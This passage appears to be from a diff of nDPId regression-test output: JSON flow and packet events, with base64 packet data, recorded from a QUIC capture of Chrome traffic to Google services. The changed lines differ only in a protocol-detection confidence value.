x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 
+00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516405234,"flow_last_seen":1621516405234,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516405234,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"193.68.169.100","src_port":58351,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.gstatic.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 02302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1621516405310,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516405310,"pkt":"AAAAAAAAAAEATej1CABFAAViOaNAAH4RaqmokEAFwUSpZOPvAbsFTs7oyv8AAB0IzUnHeeUSQdQAAEU0YnBQC8L89wEgTmmr7BjHFODkqhpFJVx7yJAYrFg6afkiF3jCqd3RVPDW00NRXnMgjonKH81Ileorn5KxvS5+yQJRAfjCUHJ24j9a3WWl0AFqEbkF0TWWqMTP\/2idN+3yLS6puV95VhaYgqHrCvwkD4lAh7BWrsu31e\/HDOBztqIAj1XIxQN5nk4xsMisv2NZkICaS+1Cze8naUXXyoJiwMgIqBi5y8cABXF6JlVU6OWprkzVRIYKgbzPUVlJaith2PL9DAVy2TL8feQIj3EkaywH0gUPZYTZigDwJE1mDupdge9S6g+LSrQwDNdm8DmnC39N8zuv8VkX39gnJjPPIqLqt8YcZBaksYIxo+UVtdEoMWKD2dTTAbqL3muQp2Ja7H8Ae7XPH8EhKuwd7Kj3JTpB13ljCjHYeyiv5t8QcUXs+\/fTX+iNUrbYp27UUsB5CR6dNjgUgwn+qI9Kd2TVTpJFA+nvmNxH9t5xpLsEajZKGz0zBOH+ePQwjH4k6LiuIOgTcn56cc2K1OQr8g6DG6GL3qoUWI2dlMl0v
WT7aDPYShopw41gzuRGjFELxdiX0M0b7As\/7rFy3G1wt+nR8GFD6BSLRMcYNH8HNXRu0MQO53XF18R+1YeIMH6X3b3CZuFq3Xfa2QILxODzwdrxgCNv+FS4NubkKVmTPXQe+uIgvq1qlryrWj\/xlUbBxH9IDjnd7Q4EC0wXt9aAeFTNi4El0ZGUFtEehFfXIXvGMKzGNTezfNJc+vD4F1uOWnnlAxd\/WNW79xPmd8oVDAkAoVRbYCE9wA05lkg9NHNsSNZQ4ZrHcfUP3vf64MKK+pkwlt\/1KIFbaqjllgaHwuNOpxQyFKZGOQ4mRm7MxKALa4\/fjze0Xdw0la4zY+K2Z6UBx0Bbe33vd2rVATAwh3fRljk25dM6tgVCsvKusLkEvU9VmPywN52CzB84wZBRt5xcE29SdbS99xZjGg98qXqdNlTjjAt8yu4XiAjezSVKKaQD3XaLeqSlZUs2O+44zB3zNNhhO5e5eFJ7vU6rWJlnEoMb5o7Dpqgg5GZm09GTgXY6uCnh4ZTxl96ofiZvX7ChhymeUh74eA1f1x3k5LEP7B+VvfkqNzqwQdVy+JB7y82M7PRA6h\/ZiXREpEY5E7rUhHhHzsCHTcFbeJCcw1KDmA\/8lN\/ad5x9wDVKuns1EoyFDZ39IMuXsGoV5K49EtAXhlRXfF2+Q4uYSZtKRw+dUt75YzrYSQ29ZHDGQClAhl8wOBfpzHpggjQ+gFIEYw0xq4417mXTvRAsHPlxM8bRQ8PcXIpBD1+\/T32bKmOrmzAVOK\/uM2XxkngmepayHjfPWCQlEhv1MTTUXO5FOHEIKK7YeWXB+45P5Jdn5DUTLIpWlu36Orwifl8JevozrwmxoIG1Zmf2m08oeXHqRUDXmNzjkDF8iRRGAJYOtcDtsPuCEzBA8dRTgS0HKprk4UBlCXOdnUl0o\/GH1EJbFeV6skk5xrmue7uPiLAyEVcPX3pmiAAOX53KWWhMQls04leVWEcDeyAFwvaITqnSDWVveqnmXMRxLOFZt1iaMGSJOlk+UqoJqz6OkW7fNx\/lAaehebe7Eqav3QkkugEaA1AnUOpe9DMxV3jHzO0ZsRV9G3EYn8EZ\/3pjUJ7Wdzgs2pUQKiy\/\/eGQsIQ+E9g46xeFn8UPrN8eiX3DgHzFdvQqN7n6GdAWkhJ2Tw7Bq6m8tC3wcytkE68x8FsP0lQnhvRc9Pi1wMCcL9Y5E9amIXbruhOYiuKw"} 
02310{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1621516405464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516405464,"pkt":"AAAAAAAAAAEATej1CABFAAViOaxAAH4RaqCokEAFwUSpZOPvAbsFThhFwP8AAB0IzUnHeeUSQdQAAEU0f14nS2wsq94otcbsx9Ja6N4Gglxg3u9DN5aawqtRKVNC4Pc2eIsI1t2bGSVlKf0XWigbLFgVoquYysOzgfEuJL\/MeSu45JN0vCO\/piH8bKThjLOmClUk1DH3WZNkFkEuaa0+lysZpqiBVvoWBmVXL7ELlhz6YnN18zze0\/2yDF90B6el4fx\/mt0wpW0qVA1R3rpNHACrqE8RyK6pVoPq3imcpEoLb3yO7yzrRrQA3ViWb4CcRSIQKKKvWiiBsQX5n0+0thXLMnu8ftL8SuxBDfepRmuDXajiiY60A0Ci0Vc1tK667yMn9eaC6rHTNh8nYovYhgNBYmIAwvsQCVPuw3uv7zcZj7QuzsQ+GoW7Ofo+0HVPqQPw3Fcv1w6\/sFDHM8ZQdgy\/TI9Xw4zrv10NHy01l+JQvzxLdL\/Mei6EzaqwXfOyDTaHClmTcUbiuXBRX2Vf7Bmroal1PmgVVCAi8AUTkagzmJDy6vDj2SKbbL\/ReTgBtoJf9YG9\/p5Hob\/OMMIyWWppTPBk2+0f1VYPZWnbqV9qBkb6EhNQ+49gd87e+9YYhhx1IWTlW9NLOLBaYwQFgXd9bbWWfmi29OGPyG3EG8nQHPU1eOA30M0hAL1iFzuLQ3C1KXPfegclGVZOp1CvUfjShhvg8c1OTN5s7Ps6ZLZZlgyBt9X6JmRDmehOI4NTymHV5ZtQR2lVl2TcptleL6k53AnKbBYD6fZ1m7Qm7wPSMZDBJsGDW2W75tps0sDwHgF2FlcJxcVSumnK5OY0dgyq\/v+QuVFHSKHpcM0iQXjJ9BYDELQJZka6TvX0wkBv\/HQW+INffppmt4qy4pX8Jnbh3Ni1t3tDnQ\/7fweO\/+RdKUkMiQ2HCjJPyE0ETTcZK654vByA7SxI0bxGOyrV39JtcFOkThujeZSYhhZM23Dz4XEH9y6JuKs63RrvY0IkUQVSK6GA0tRTMG3mwmAob\/hfPnlVRnA2pVbvTMeZUlWCHFzts0AL9+PXmCSER\/XfzrXwjfrJuvzm+7T\/lFRR+d\/i0xl2X0IkHFkuV9wydT+v0RqXfar5ItGT\/sh5mrWNveBVdVlQJkyY8DBePhN4ArItPiFG+htl6KN6q7WQdvLajCgHRaRtH4GQxWZtZmB1Fg3DZcxEek8e2BMmaOPY8gBgng9q608TDXo9Pt5mxnWStws0YA06UTqWaNh1x2Une7VSFk8tH41qCiAI\/n2bLjiAoqnpJB\/cQvnfvFuY74Da9t\/5SFaJC4LXt0ZQIRJhn8fMIsa+pDVIU+8qnOzaJqQU5AktC9HbX1ISQRPrusR+iRsZxLKNNS5lj2e3YvJYsOdA4xy3eH3PevVRBgLucZfc8W1Sg+7crP5FPF+V1oksLUAomnQAM+uLnpl7jWA5eWJfsqJT8r5wB\/HXm64IPwfS6kzQmr04rkzCSj4t9jKRGjOo1Cs0M2KVTyz5diNk8DfzKuTIVdn
5aJBg\/JHs6Tfr60kgcyC4b4P7qkvjih7e9lIaD1s7QzKhQlA9RuZPuSNUkJNf9zFhAHrlKpelaHjuvOMD7bCvtJ13MWT53xGxxb3Tn2yae9wN5yrxBUdBvqKCc9sg8zRym9VCJUCAOFTs3LmsHQjtM74VOXrdEbkzWhp3f7mXZ2mms9zJ9eH6fhPzVnmEuOhWdc4vKs4t+Uni9Rz2QUxiNfcPb0AlKfZGRFS5DchrAfVT1vo9USbhMF3YNpBh\/huOyVHNzkm1++SOaPkTBO1wZlmVb\/GUDFQCUtbTRtKz5EY5n6osCa5b"} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418037,"flow_last_seen":1621516418037,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516418037,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"7.71.118.27","src_port":57319,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1621516418037,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516418037,"pkt":"AAAAAAAAAAEAYl3ZCABFAAViOjNAAH4RV2CokEAFB0d2G9\/nAbsFTh7BwP8AAB0IqOC6BJZvV6IAAEU0Dvi2qrd23QDxGu2B7vaN4MOlDBtGvpoN5pHp26m14lzRY20peRtUuQ9ptItsXATUG7EiTr9GCdRPLOQETwFtC6RhGNIdLTwnsdX1wtpxLn88sqordHPzeZRfgg7Si\/hIcgk2r6jQqYTKPyb2EXPMZun\/DZnzAKBT4U0s6IkU9DCx\/nVZgKb8ZQ0clSgRRcfwhUHErM8eTU8YJIOg18cKJLd06pcQOIJG7NWuFWxlP8hu\/nN0AYaI66fR8yko7HlWLvum1JaYm6FYnzxA32PBj5oh\/7LgHk9DvkAOButBFcUmyPrB4mG5I1fazNr3nwyskcAAwio84ahFtiK2AWGqstVtlbFkBz5vU1GgAY\/jFxeFFhQU9bkVT2J83JetFccigg0SDPuD5n+d+pF1ktpVFhfg9Pf7M1yVpEd2pTwggR6\/RMwbUXsIy6V\/3Zdy235MvBR99y9lqd30EtEWQFDwQx1rFv7OgXmz1sC52olWXTPJJtqeru5YJ4y1QXdwzngLTKdWwkivONoSni7YFa
QywfkoSfUUq9yPIHkBPfRgLZjtRnJvNRzSUdIVLK+82oMRpqWSDyuehe79xRqTV3emacrIoUpKNe4ES0rwwIIxuczcriuAc\/oh36BCnJTnMLsUHOv35tL0tIW69QW2mqLxjVxs\/sB2ZTY81BvXCGKlb2GWWEZboz4kvNje42VnawDq2ARmXLjmZvqx5KpuiDDLCrFuudk1KPohXg8MYwloe1Z5ljen+Kflp\/0GhTarwpApPLhqD4dC0YGPGUPWy0M3SdsjYAYnO0ufi0JY1lS9wKfFr3M11xtfXz4eInUnYb5wKqBRyjzjYcDgMIhrig+xpGm3NO62u1F2ixUHh\/2sre7Dp47yLp70MwKIP+adl\/aS+nE3ZwouBFKcqjSAsPBSGZchE52M44ofrHvjCdZygdjpUAxYA3pbEVs8jkZwgMgJXo11MS4xaeJGvyTRcdWxgO7Z6GiCANH9t3fYZEhYzw2EjE5ykKJRHZRafzyzvQldpdzPPsPIEmtpkI3mtt2v+1cYj4DnaZTXJEzplScTixfIquKqwVCom+EBWD3psfkqjfjfGGAzGt5GoJ\/n556S51FLopQS5Sp3W5C+2M5ojItue3RQCrCTIS76Pfo66q4GsAOSUZ7\/hMt\/XWeMLHxlw2ixjPGWceCE+ADtTZrMdCOe\/3\/KfNqayz9c7lfFveFHD4SoBgMlybRWMCo89EVr9\/e9bgIvQH\/2HIKL\/1AnrBTYWGwjYvXcCZMo2XZ48Bf4TAHJOLQ27twcS66XbobssW7dEGTHzsxM2cbXA7Mt66nR8kV7FnqvM3Uw37ERNKYGRDJpbb0E5DL0AIoUX6jOOuHNgnhFdj03d8npRdhJrYtWfh1KUyehyWQPyGItDjRZyrH\/YzmHmQlGRGfRB2IOJPpW0Awf8t3u7i7GhjjxzZWH9y\/5\/UIGZyFN5xYeSW1RjHpBsgozg4u5tX+KFm7iqwM265C9T5IiUFRDJ7Y7z+ArBTMIKqef2Q0Utflwho4O5OPtNfbJpYHIlEDdM\/bpqXNeLkZvsI55ncrNB0jXRjS9R\/pqCZ1F8bfNDlgCa23mWVU\/e5BsYcM6YG+DEAJXDSOtIC6Sp\/ZcQNS4oqLP9h8MI0zXLT58ZIPXRXVMDFrxMhBGx\/6yOIu\/74H\/Y3fHvm7xBKcdhdXm+aB2FiySmLOWsjvBXvSzYQ3UF0qKHH+MtZqFhGOCJk+EykBVABGv1Auw7saDcOGWE1z6rr+udwYUhMrL"} -00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418037,"flow_last_seen":1621516418037,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516418037,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"7.71.118.27","src_port":57319,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"quic": 
{"client_requested_server_name":"android.clients.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} +00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418037,"flow_last_seen":1621516418037,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516418037,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"7.71.118.27","src_port":57319,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"quic": {"client_requested_server_name":"android.clients.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418245,"flow_last_seen":1621516418245,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516418245,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"53.101.228.200","src_port":60919,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1621516418245,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516418245,"pkt":"AAAAAAAAAAEAVM4PCABFAAViOjhAAH4Ruo+okEAFNWXkyO33AbsFTsjCy\/8AAB0ICh\/nnOWyISUAAEU0\/XSWRRoxvD58Z\/\/ltqn4D7VEFtfFH+jUGx0Einkv99\/DSfc2oPJY4DDN6JlHAc\/qXovlR01o81cgEAuTHi81V\/Ai4h2uKfJC8zpGb4iU8J9MQX3bFzSnnvrH0McYkR8dXhY+LkUeHEK56Er3NWFCyGj5bFUc6ULxpQIONyO3XCblXJAYYR1+HHMJV5rzq2a0tPhEQxMvfL9U2zDwAk9Znp3W+SBmkWdokjyAXwhbri5sLFI+o1IwVydXvtiLNEKZ6k23ZHvOevpJuly8FUhJlRZFzpQcsb8oqZg2pRE9C8POq2T6l9g2U9I6GvHiVjRZ98FT9qIvvDP6AD69Cajx3mGJWavv6aTsctL4VNEVQVix5W4yMVeC9v64prq2LuRUPHyNnEo9AoCfcOTMnnedkniclIIocpUSham+VwWsPb7ZVt6yBxcH8dnhbZwZX\/awC1yWaJ9PMxllHy6dWdwFXphZE0mlFrVD+Y2ViRFeWYhgXMd36a67EAh4KMOW1UUy9WRijdPxYzI\/3NPUKYw67EbvuD9TnJBZV9swUxHRb5oKjIJs\/zVJKEr4HgEriVT\/uHrCBUdG8YtziQ0VN1Hy\/c\/HszvPKD1I+6T3S74uGqEDJvz22fQycnxExC\/v2s2Io82JRN0DQ9+5+lgxD6yIJqUZ6xtHI\/7Qf+h1fMLSx4y8AKIJtJIOrgnAYrglEsKTnvJuZ\/7orf+yJX+h9BvEb+CqTGkkDjnK33BqpeiRlD+D5DuP3K4T+NB+diP9DR5dBkwLMLSdQF7qGWEWn7GBAMAcRho5edT66etmLlAdwVt2TRqnGXiBMNQSBXoW+toMKpTp1vnHlBgZmKFlg\/JJPZqOdbJdAyv3zJJRFPTBKEQoIS3zCUzYSTKEr7ud8E+tffKkIrAJ7EUAESGEhVWCM1DXL8i9M+Q9XJE3DJQpsWg6gUa9Fw98FeLlP+7TL0IhvOxx5LUeAalBQ0TKxj\/VCVN3UvSZDTeC9WpGfDhna9DGtD1xTnAi7jRi4CrseNR2IgaLm5JlbfkFLKccFrhInfwGJgkHj29LRsGRm1Es1jqRY3Ouk6bpGmMNWzcEEimo3csuOG58WiAdQz6WHsuiuYVG0DLgVi9H6doI1wsGghSdqDtHqoEwoIgb3tx5I7T\/h1Xq5LT9kt\/Uk5CeAEtSXIu4d9PJQM7OynI4I4wJApaL+JsbkbYJmUckRDj5+DcoOsYJRi+S3AzB\/jReXlCiXkDNx221LihD5QvdlILM9b41NYS1jREAGiqCaAAzmvoR5TwO\/4AEr0UdVZbLG6KYh5QUiJ4oy\/WVulKKHF6+TFf4tv4Um+NQ3oK95TXCRvmKZ3qS4aLtCdIbdrNCgVhBzlGHMjvmy6t7Qw421ogxqBJtm793TVCYZwBcnNLdGCCZCEtVQnfQzr8G1JOR1oO2iM8csHv28RhmsRXcaa4e0qdrR5f3akye3zgahd
cjiXHhM7C+O7G\/1kLFug8TwlbhRgFQM9CkofyNV0s9NwP\/y3Hufd\/UIKneZE+EIy8AHj+5ijv0WoRhBnRJXYX5ycxl46tMEue8ARKo9MQUXx8V0we4qyXSx8gTP4pifQiQH82C4d\/Ia+gl\/7V0nVldVjo2XHTYnNKRl\/2r20w59XqRfVr2MyuvliKCJuXMORzGbGFmNF4tyPP98C4DrzmbvG593DjxQEJxLOd9WIDUQLYmSmdG68jG3Dj38xlZdbebj80NJ8y84A3+pm6EmRMXvK3LUyTKkRh1+p8LOow4Hx0dv+gfwFZd"} -00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418245,"flow_last_seen":1621516418245,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516418245,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"53.101.228.200","src_port":60919,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"adservice.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} +00937{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516418245,"flow_last_seen":1621516418245,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516418245,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"53.101.228.200","src_port":60919,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"adservice.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"169051af8572ac08ea1ddeee0db208bc","tls_supported_versions":"TLSv1.3"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516733869,"flow_last_seen":1621516733869,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"144.237.113.58","src_port":50423,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1621516733869,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516733869,"pkt":"AAAAAAAAAAEAU0VlCABFAAViPaJAAH4RzyuokEAFkO1xOsT3AbsFTgHhyP8AAB0IbGyalH0+wYYANwDvfHyuzX0WyfJVw0PoKIyEKIwqfBNF14sFAvA9Fx6LB3xU9vL3ynu5LnbexvzNtyumb4fpTS5E\/XHfpwPYpXecyozflPK20TknHSDUVHAJTY9iUBdGsc+gRxEKw\/EnD4N0ApvBGoTWqmVkqyn2sk121zbYGDW6ErU1q+8hsbyKMoI4NfxjBnTspog\/m+eaL88Tqahvr6VuGmJOgsgyl\/gwce2fwd+d9PpunMJSkAS7yf2o1eZhJh9pY3klOtwZCFNQuDUJCJjazTJU7eVP\/0CtOYR0UdFKjm+WWzcoEB4VQS03kspRhaM2QP\/ptwjbxo6FO3oCmYBuOzT9NnCTurb66djTzhBQ7nPe1yBZiq6US4GpZG6aMK89NuAY5\/nz1pP2DYT5YcgrfYdhQ4YARsc04zYfLezdFb87pJyoch2m94u7HYMn24Xcbst7wof0dZvjDWkyw5cSFT4dsIwT2M8hyrtH3HjdLtgpphSCdYSyGuy9OvG7sn+MF0Jh5\/oJdnlWn\/USneemL\/aWfg+AXzhA\/IStwKORkQ6adbv0MxxQxhdhVlhABYhBf0naSCmQM2+cEelsB22JQdGyxVRZOb7H2e61nRmdya
7eNqT+fobtyVJrZCrcoLN2LiU5dsnsqDNucCyYvDEkyd7kQp9qzPoYerFAw+PP\/vmmBvfd8Jm5zV8ExYYVZcEdRnY4EYoOzAPXdClrK9VuYF8c\/Y6ePAmXEmR1uClCx1ITHFshaCJhAhfyTByXjbfw\/nXGIZwveSnxeIYy1iabwqW2LFKaTx+JSk2nPQUZJdp\/gZHAXMi8UAeayRLCWh88FjEs+voztNRueCatb6uKPMygUEMEU+6M57k2I2+uTJVrFNtw0naiFrNM5aQWh\/8BtW73kEKOXlb2OOpWG33SsbDbt8f07KgzTSjaTcH+ym5fia5Rw7fV\/ORX4hRDVw6rpMBK8vHEzILGzqKPp\/Fzgy8Yu3yhNuwLA8BgUfSc1ByPGepdUQ33vZYRwkYXJIqjHVWQAfskEje0Wqn+YSnYlWZx7JpLG6MxX086GP6N+oCsmXNLxDtBJtSXiGmOVBp+cXeY5yNiplAtTeIdcdjOB66FqojPXZ4qFgzu67AqMMGZObJDMv\/Z4GW5X4Cgb4uXU+hjHX87oTa1YVxX0+H5LL9RQod7rJgo0j7m61cBp5xGUl\/xYmnsu3DdfPulCdT\/Xqvq9mDtvBpKPSZ89x120bFELyq+h\/m4PzITFcG5b0xOCTSTGB34QH9z4hfUNaP+WHZEXy5YNzh9YM1YXqvIrO+\/iwEMLfq33bR4jnXtPX1cFX+a4qrWOvuTa+bfX7Di\/IJNdHWVlIftUcO6+NFoLKQszqgdSRApeMWkwSgeT6R7yYowqnttX1EOkto0U21n9qsOOcZHS58\/p7UHB8lQVB8xDJnHjAwe2Yv8frMkPRsbdRaenhBn\/LLWS\/wyADvhqIIoQldbThikVaSXVwKU6ENOBP1gszcRFozOxr8R01PtBlDQ5QyH2EVc978OM4JjBCTbqtEjexBUwzGSaTGclsLHYMS3BuvKzOU5hVb9zTw+6jJKF0aIvgkbJVna7j07Xp335dcN+9bFri7aa2E4BpLCzZy+JNpokrgVDpYRk1pV3jGV9trdQsOs8CADI3foMn58d7Q949RGX2Zl7pv\/I5Gf1FwKxygyeU0D5cHoY5DXRYbGRoDOtCFxU18L0wLOrSKS8JC+eITcsIp6lD+\/42Vg3uHHr1yzTR3Tr7duzZ5RxafR49orBGtHZqde"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516733869,"flow_last_seen":1621516733869,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"144.237.113.58","src_port":50423,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 
6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"37b57e2a60f871d6f459268f91669a78","tls_supported_versions":"TLSv1.3"}} -00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621516418037,"flow_last_seen":1621516418037,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"7.71.118.27","src_port":57319,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":179,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621516392616,"flow_last_seen":1621516392956,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516733869,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"126.3.93.89","src_port":50224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 